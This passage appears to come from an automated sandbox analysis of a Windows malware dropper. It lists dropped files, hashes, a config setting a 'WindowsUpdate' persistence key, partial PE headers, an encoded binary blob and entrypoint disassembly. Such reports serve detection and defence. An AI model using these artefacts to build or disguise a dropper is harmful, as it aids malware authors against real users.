                                                            Preview:41rx9j46e8774Q0k055j29vDB39ly790P2iBnpB61RPYczDCTr4C1PJ3C8t4Icmp3DCUq7854cjTI9X681EZu812rH22v562MZgt3365Y0J3BXWgDG2s51620S12u0h85j189p4P7z5zcLeRxb5..ComboConstants UpDownConstants..37U5MZ3d76v1VD2H8kj3gzq50I6718xA41069T54Us0p0A8O07EmC2WoEV8OU1vUXCq..ColorConstants ToolTipConstants..RSo7L8oB5gmp0GMU..ButtonConstants ButtonConstants..44t458LiNU72iV7c14Z..DateTimeConstants GuiDateTimePicker..28tB5B90yi282nszu56931d957YFxXq273v363C0WdG99Mw2UhTxLg352Hl0I..FontConstants ButtonConstants..3127S1375ZjND6l46MU8Hlp163T48ff4..DateTimeConstants StructureConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\ofnbqr.icm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.630202092843055
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2D4C59440B9BA7F2602B787A4E54EC69
                                                            SHA1:2E83423FF6F24DB5EBC610535BF95194CC7DDE58
                                                            SHA-256:6B376AA5918FBC51CFF3557373CC24307971F1C4C12E5C9F81DB3455FAFA6D25
                                                            SHA-512:A14359E1D7ED9AA196DB723F7FB59883482C84AA1C29093F56FEB6B400F33E3D2A9DF58D8EB20283AD0B63DD12AB0BA447871411174AD911FB800C2CED50F51D
                                                            Malicious:false
                                                            Preview:2026m279q345qg7M7s697E173Tt2p186Lcv796SPkY6G93T9Hwy0c80h1jKW8F3EIK9yGir27L2vM794P586zJ..TreeViewConstants ToolbarConstants..92Q5cHUkbG08oG02Bp8raMsl4y5c79gd27w49Rhk215s2SP9480n1bha2407293BpL978x1G36019E10h1kz6442xzKG5H8zjA0..TreeViewConstants StructureConstants..43Tu3479C8sFmhlS7XwhfH2X84HI12TW5yJ7892p3NG6j18697vo71a9093oeVF2Y7800L414pv328dY..FileConstants GuiDateTimePicker..RC5718ZRq92T9sY5Zs6Yd3B93777ML67F2m780O681BS22442IdS58bOg4BF79G3a5Z..GuiDateTimePicker ButtonConstants..16S622KK43683FGk96y2vov7FBCLN9R06O52O320hVNAlcFqI4z82Ul9WfT8gJ3a8Nd4T..TreeViewConstants ComboConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\qlmmu.msc

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):625
                                                            Entropy (8bit):5.475853492450421
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BF3CD347D5614EE1FC2AB7B1798164BB
                                                            SHA1:976562CC6D244AEFCA909FF3A31727E3AD710937
                                                            SHA-256:3605CD8EF5F90DB2E66E7EDFAA6B2F2CC376302112241BEF4BAD162F7C7EAB53
                                                            SHA-512:781A76D891CCFE35509E1D3C255D7E72F5D09A4A4DFBA5060802FC90C4989978660065DBB1ECAB4EEA1EE150DC9AD39CFA27CF0ED0879A1DE2BCD6E55C0B6483
                                                            Malicious:false
                                                            Preview:4b3vA9keP540R63i91C23..ButtonConstants DateTimeConstants..91aS881dbML4j1c98a3hfLh6N3600468o69eP9X040gwnZKX7u668MpOe7HIijmO47753T0632nH..TreeViewConstants StructureConstants..656p7OMVN24L77D9V1aLRL6Oc61937719..DateTimeConstants ButtonConstants..18f9007I1F0L606..TreeViewConstants FileConstants..s5YxrUg99915U198f1aFx39rC0417yXg320546w00O55J1NSZuqx0K256C68q3ll75F3h5l4F74o02O39avhy5R66Jy995k1zqi2Cwot0bKc2Z5168801E6o6dKK980CqRrV217t0975693Q645m4jFleB64re387Yaw53..ComboConstants ToolbarConstants..n8090464a26032Cw1KH6E4Pnu18079kn9EV98S6a644421Y9087z085vN124t9ANF89a5vU1U27K67lCC2Rz32fw1f8R..GuiDateTimePicker ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\rrdkmeratu.mp2

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):520
                                                            Entropy (8bit):5.6112414182811925
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A46A327A0FCD8505553A963445E7E509
                                                            SHA1:3F15FBD861C19C4817A986F949C2A42808807975
                                                            SHA-256:0FCBF77B85E94EC077B5C96EC53FFCE6F1B2F559BF712A12387F189F6C544093
                                                            SHA-512:F5CF3EE0E0F9280E88A4C0E245F09C9699707F899575D76B8F406C1E1D8D3595D272F67644C702115B6E760614232623D552171FE1A6ECAC7063B956C22ED75F
                                                            Malicious:false
                                                            Preview:sL7gZM51T4a60J12e1zS61P5M51g9nSfUj0TUo8ws19Y40rI6uX92cP406a39Y11m8Q1638XHgSlSP45Y5mF673o8yk2y47W2t3pN6k2TYP31DBO51Qo6P4..DateTimeConstants DateTimeConstants..17djs29a5r166S1yA6dr023Vu509650MwK19e100OTKnK9FB80Zg0IZ49338cCzt4Veb1Mq0tVEs1Jx1K630655R1Mw881IKN2Io0r12R63nbv45DdOjON587uXA52Nc0j8s2I02qH..FontConstants UpDownConstants..XguGe0374591GMBNpL3VEWc59rWn4j4T5Eia603FcPWu2w0Ds7z36JyhFZ3d9026017Uae1DP8n682zdGpc3c59266f430S2L7LGy74i4170OM64D5j57S178NzkZP591I6ImR273S6j94t8W6rGz46v3..TreeViewConstants ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\dsvk\twna.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):545
                                                            Entropy (8bit):5.58091263701808
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:F1A4A151D27950929A91C6C98DD4386C
                                                            SHA1:693545012853D5C5A82778B73A766D0571B812CF
                                                            SHA-256:593EBB913D36131695583CA72F0089D896219F7184E96576D62A470D2481271C
                                                            SHA-512:66DE7CB53C15B52B786E246B7E0D60866EE69207B22579A59CA142F063F59F5FA59209B8104457E43D6F8A6B6E3037346E1ACCC1506C62D279608970CC765316
                                                            Malicious:false
                                                            Preview:LBk10C5325TYW40h7sXHNWaoJ58h..ComboConstants FileConstants..9394eH54r2SmH59329772649xJQgnK74oY24xZaYcrz4jz173293338e2DHs45C6li35gG13GGJvl440ICwz50H16P6476837Ei4y63Tw6LMCmG62Om6sY2Ia..ButtonConstants StructureConstants..9k86ONlpV05GBZ9B7mC8vL90p9jnfBV0cO9Pn750xq9s52q60z16tRz0005A0sNw1n366i53bSY0Dl84675uI30k..ToolbarConstants ToolbarConstants..92ViO23876XSs6aO83d8gtk16pV2f389r20dD42Ep2JmbDTzm43227T40QXJtO508W46K23441z60UCCM7TUI8675n1l0T451re4dpL9EY4WouO1AVS1S8F415Q561sN3Mf522cjAp39Dl20op0Qj508741vHpMz6m019c..FileConstants TreeViewConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\uemcpv.anw

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):571495
                                                            Entropy (8bit):4.050101452531791
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                            SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                            SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                            SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                            Malicious:false
                                                            Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                            C:\Users\user\AppData\Local\Temp\dsvk\uvlpmsr.icm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):582
                                                            Entropy (8bit):5.529913214319818
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2F2C210833CD14B8EAD0EEEBD118308C
                                                            SHA1:BAB671003DD2BDF41EA415C7FD34CD334FCD74D7
                                                            SHA-256:49482D956DFE1659D6EB46A6540943779A2286A3BDB098CD3408821CBFA6C7BC
                                                            SHA-512:9772264E779E6BE0837BC4AE84C411AAC8D810F6582A7E4A475DF87F4FEF7FBA1A391DBCFB0E181AFCB9BC9F34E0848173A69D13D53B7EC92DE66268FA2B6798
                                                            Malicious:false
                                                            Preview:yrRE1HZhl391H0v198a5rrVLU58T5Ima11ka577E0YxCS3wC900RJ4SWXQc4i31985b91008qAe19y612ywy050..ComboConstants ButtonConstants..Y2Mn5ss695YN141D7UwLG8o50Yn30O3PKmjb8KMd11O15gcBy8378liU18Z1DGI94u9PyRZJ3475B06EP4344T82XF4r18Mp7wOq2584rH0snMtYtB207Fj62eg8t3SH4m2AUfGm9U258..DateTimeConstants BorderConstants..V9MPt1p48z1zq3..UpDownConstants DateTimeConstants..4Qvm49W5pX45QZgZy9T6X0s8zwY0119t7211mW778Z5l41wlYok5l4132ZZ4Ci072127W5m13141q68496p1Hc6GiS76Z5i2W7uAk6..BorderConstants FileConstants..945k347B64Vb115B50k521Gb7T2s9lQtO515F46ZFK5mmX1564n7s7CvUv007f2..ButtonConstants ColorConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\uxesurv.icm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):5.607034598914599
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D49513890FB6627AC0EDBE70EECFADCF
                                                            SHA1:E27A186C75DB61200D77ECFD61DE6DF4915A73AD
                                                            SHA-256:DB5D23C7B678C4AA7EC1EFC31C08276B38B98DD1DFC17F64D6963210368E233B
                                                            SHA-512:4F0A5A8FA20BC9C9C1941EC9FF2BDF65093305DE39283867AED1D8AB58CB4B63F2F9F140EE40A1CD4F455AF8368DF93419B625FCD3353C939A808223A47F091D
                                                            Malicious:false
                                                            Preview:s6b6tXEb9X3TJAsDJ2r34Joy..TreeViewConstants FontConstants..GgU5044t42c0lXW8e5p1z96t7Cyb59280E00y1P923gIix6S307p5LYhL976480565Qx1Q5O9203Q90LUlOl7B04WGq5Rpzn1hB7Xi2pkk739d1MLzJ715bvh3q0tSCl02f1L8ST46TA..UpDownConstants ToolbarConstants..0l1G4Qh5N073l76DW2990C43eosFAAT3w4497r6utWpR733D..FileConstants StructureConstants..H8s73W8K9X0Bp30M8vq60x8k1z528Y78H6w4Z22LT5shJJ2ZH709h41VPr87Yeh87St27gM7Lc8654c9O2ngO25a25mJ66Nv63lxb9d7HK8ru5QB6Xc1271G0vG96nywBwJdh50dw66KjLK2w34634P60..ComboConstants FontConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\vgusrmv.3gp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):593
                                                            Entropy (8bit):5.554946572919045
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CD8691BCAA6705A65F08C872A0AE7BC5
                                                            SHA1:5E27EA4FC964E45D202023F8FC936CC6BA3F8A16
                                                            SHA-256:27C93A8E6BAB6487A5AC8AB450FCDE1725387B5C64B324388D6C773AB669FB46
                                                            SHA-512:F7C9F29E7D474370F458587A00BEAAFB3AAE8A3B84D5912D90C2CC0CBEBDED0C822C1FC2C996EAA94D5CFD906E3E0213F18FA6F7E80FD4F90ED001DD2947BFFA
                                                            Malicious:false
                                                            Preview:01VQwM7xt648M7u3042836G6u2T49906n76fV387412jxzz9hc5743483U69117e8Z722..ButtonConstants FileConstants..94966G9TOzGS6ebo42gyHD63He90uu65uM6s5540267589239496WM07AdI666t6v2Gk875Gu3dXzx68e27O4XR37em46qe3c7Iu76ckS5N71Y4qz46fYr95rMXg8XnkgD301G71M..UpDownConstants ToolTipConstants..tR4Zxd06x9Pp76Z913dan53622t3YtsB0eGC6ZeZ2vT35RrK0ZA3qpeU6296j8054CF7w678xSYp035F0nd59f01n57ZN4L73175Q5519k4821dTaSUxe0A0R8R4JksVEcYFB540459207C6O43WJF39j3..StructureConstants ColorConstants..6NB0UQ4bv2Vn07i6u41973XJD3w71hu9u10J6HHc03zu6DE5g31251uZ3qv8h86Ui9hT81V6auT6U25T01R532WJ..GuiDateTimePicker GuiDateTimePicker..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\vmcsd.xl

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):5.599725191775324
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AF0541E9FAE855E7A52E80C9E0405F98
                                                            SHA1:6F7856575250142D114ACA995A9652990C1E0078
                                                            SHA-256:0CBA71E467A718727C02FFC94934340EE623B1504CEABC4FB6D317D2A7AD5F58
                                                            SHA-512:C0CA701BEEC8CD1202C4B006095082C2DDD4EA1EA4F2DC50E9D23F1A18C6AC35C217DC895CBBF5690855F94134AD0143D44D69A36C63228422ECF176BA06FDA5
                                                            Malicious:false
                                                            Preview:p36H6SjF1562QK56348s32gcNz517N5662lv8pdm4r0eAz8fX4r7m2..FontConstants FileConstants..2q1cqu0404NIS9VG8Mjh61D038cdWjhG4w9A5arv4083a2Sl2ZvCi21450k7T1rY4M3695u17x75p78knj1A3551k062y15n0HQ81674XVm278BHqV9BB4..FileConstants ToolTipConstants..8069WkM442S98Ck6X8qEy04FZ559vzE55a622039qW53V3PzpL955..GuiDateTimePicker BorderConstants..6J9p1n1d3W41i957604290382V80Z8d5srf5S9z60zxOC69D2SE23f1xHic64d9uj3tN43atG16aua5en37GmNVB91Ho47EqXr6C2ChWv6F2565oFp2d38N0n6p7P89TKr23C86U2A2T6M0W7qRonO5741bIXaSbkJ65Ro9q071v8..TreeViewConstants GuiDateTimePicker..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\wluqdc.msc

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.52732025652089
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7AFA77936136795EEE474D1427C6860B
                                                            SHA1:F3DD2C335A2A1556EC7E0C4B1A84B879D7871A61
                                                            SHA-256:F2C9099CD19481ADCDF5ACCD3141031DEA2069F4AB946F82E48324390BB7212B
                                                            SHA-512:838A510F9D5D749972277FA36B5F88F4BB2D3A3EFC40004878116D396E0E73CA3A7A3BAC5A086E8AB16BFCEA8FE40B280456CD7B45B09046EE754951B85E9B7B
                                                            Malicious:false
                                                            Preview:z5E82EiiIn4Yt18i7Tiim73D520Mpj99Evsi23x2d3lPtAysi12Y1u7tiw..BorderConstants ToolbarConstants..33q1N513L71427ZT8263TVkkE..StructureConstants ToolbarConstants..9B431z07D8Po264MBdr2oW9ae05oNiv4213K1E3BJh7GPE8WC225227k757d0181d01u3C6i07igd0rGwr8J93Q5j08S21382ol6QtF630X7k90repT9Z14Rt8Md4P..ToolTipConstants FontConstants..7A4y643yf5QC92oL71xa1uN89Wz33011Yj..ButtonConstants StructureConstants..3y8YAG940NwH1ug4idIE9krI8t9U9bN617z7mGoL1K2V7ml35g9..ToolTipConstants GuiDateTimePicker..63428ZGBf9AXr1WjTvh953tIS5QKkGNTP5erclxJ7xc960515C1757g85x6tNg64VzD2063a6..BorderConstants UpDownConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\wqxfi.icm

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):604
                                                            Entropy (8bit):5.630742912178927
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A7D646B218E8D14309054A445F055721
                                                            SHA1:A9B352E14544F39E52ED37CAE95C133DDE10A166
                                                            SHA-256:4361A6ED7BF9F6ADFEDCD6C211FC5C0759BC0564653E372BC127881974466934
                                                            SHA-512:327C01AE6CDF9844E45ADBFCEBA2B3E3473C1C7F963992B781956FA9F3DE96E19D6570F6AA928CB208732214D339655A8015A19C57D1274723F66C32F56CCB04
                                                            Malicious:false
                                                            Preview:fiPeEIy73Y85..BorderConstants ComboConstants..3931241g3n2m91W539vsJTVwdKfCFt973250V7t3R6SF25u081N938MK56zrya45o6UI94I3043yX6CX88I0F9jV9173zMh0Q9wR835e493H9K47vyX35bBr7..BorderConstants ButtonConstants..76197BO29bpi34bq468HLF86NlMR4g1dLp70h39cAbt38K6z321m9vzWy1x8fvBE7D8z45..GuiDateTimePicker GuiDateTimePicker..D9Ii70c45twVbmF4Ser7wYtbdBe12899ZFZw6i1R3Zu8Yqu078D5R9Y15dfN72p3Oy94P1b2177181O88G10vV94q3vS42C0xS5x76H63xvh76W68280R87l3I19B641vW7h7RWU3871h5615ZR48EyRei..GuiDateTimePicker FontConstants..w4z10485N3Y4gXI0a599f35R30Ap5u46IN96N10G171228d98H332ujaXsD3j9551U..TreeViewConstants ToolbarConstants..

                                                            C:\Users\user\AppData\Local\Temp\dsvk\xlrmhegdb.mp3

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):603
                                                            Entropy (8bit):5.6339556731673985
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E567673511B0E87E9582F248BEBB9132
                                                            SHA1:2DE90139ABE461A9C9CFD885A2FB660EE24224AF
                                                            SHA-256:56EB9CD2AAD3A869A79E63B8867C01364B091892AD984F2C31C8F2426656881B
                                                            SHA-512:366EC7F1DA50C20CCAFA58C967724DF9F57635AB69FB2E5F67F430EACDEDCF67668B7B957DC46C2CF42E6890DE90F80C2EE46656795C90F16DCD4AEE9627023C
                                                            Malicious:false
                                                            Preview:28f6F1j260yp2..GuiDateTimePicker UpDownConstants..DZ146vE8of5Ksk34P7Za5vgSZ0x7aHraa53rs0LwqDzlyAd6ZUhp9uCHx349VYO4n881o91CbDmg6WPC339P20M5O41..FileConstants ComboConstants..8481486m1TM7G0p3h3ScH588GM7Omo6J3444n901cywLe4..DateTimeConstants DateTimeConstants..57lNxaQE9RcW09rU0E44gS0AYE20H9BzsV59fd4N179ekYn3z6L4Qyu5S5088nBWKInCA9xMDh7..ComboConstants ButtonConstants..m2WC817As0fO7ph957p344S52gGPF0..GuiDateTimePicker StructureConstants..132S2238746DkWcN4Fe7Fb53QDtDbvpEyp1r5Mm5c49o9bu5I2V04DRJpE35J1y7Et0k17t1MFd6Az57t18Q5069qQ6u94y1Tb754STR2wbU3CG5v74uNho8aF2ET92B646lx7..FileConstants ComboConstants..

                                                            C:\Users\user\temp\gicjkqugui.docx

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79
                                                            Entropy (8bit):4.913293768025657
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BE6F48E1E7F7A1B12F74BFAB297992D5
                                                            SHA1:5FED72E7B3AA1357F55E8C0E9A8A0DFFC368B0F9
                                                            SHA-256:EB704F1AE1857D3DAA82A5830FE1E38A13358BEB666A32CA277DDCF945DDEBBD
                                                            SHA-512:674DA1F1DF8A6D73932300EE0F0E713D46DCB6484628666A70FAAA541D0F302A17E79B2236D9EC896C198D914537DCDAA01EEB44845B11C8DE9D17F9CF7A711A
                                                            Malicious:false
                                                            Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=dsvk..ExE_c=tguujh.msc..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.790894891507531
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:uhbrQkYNzx.exe
                                                            File size:1'264'257 bytes
                                                            MD5:c98eea303da1d7b92f96d6a8b62d74d2
                                                            SHA1:1ef9752163fa156a8831d759d2750ca23fa38e26
                                                            SHA256:f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3
                                                            SHA512:7b2d39051e783fc56196b9276b4c3d85fd56c747c4e0b2de2d46dd351082e511b55041d1658811d42a4405f7a2b0655accd32cd045aa65b0f63422c7d90c63b5
                                                            SSDEEP:24576:KN/BUBb+tYjBFHEPxZsoKEKhkiM700m6MnLT3XiM0hD6di/Aw:6pUlRhSELm00tMLDXiM0hDTF
                                                            TLSH:814512127BC48473D17225321FB6975119BC79611F628A8B63D06DBEAB309C2D632FB3
                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                                            File Icon

                                                            Icon Hash:3b27271313eadc4f

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4265d0
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:99ee65c2db82c04251a5c24f214c8892

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F08A4D72FCBh
                                                            jmp 00007F08A4D7294Dh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ecx
                                                            lea ecx, dword ptr [esp+08h]
                                                            sub ecx, eax
                                                            and ecx, 0Fh
                                                            add eax, ecx
                                                            sbb ecx, ecx
                                                            or eax, ecx
                                                            pop ecx
                                                            jmp 00007F08A4D71FFFh
                                                            push ecx
                                                            lea ecx, dword ptr [esp+08h]
                                                            sub ecx, eax
                                                            and ecx, 07h
                                                            add eax, ecx
                                                            sbb ecx, ecx
                                                            or eax, ecx
                                                            pop ecx
                                                            jmp 00007F08A4D71FE9h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F08A4D65529h
                                                            push 0044634Ch
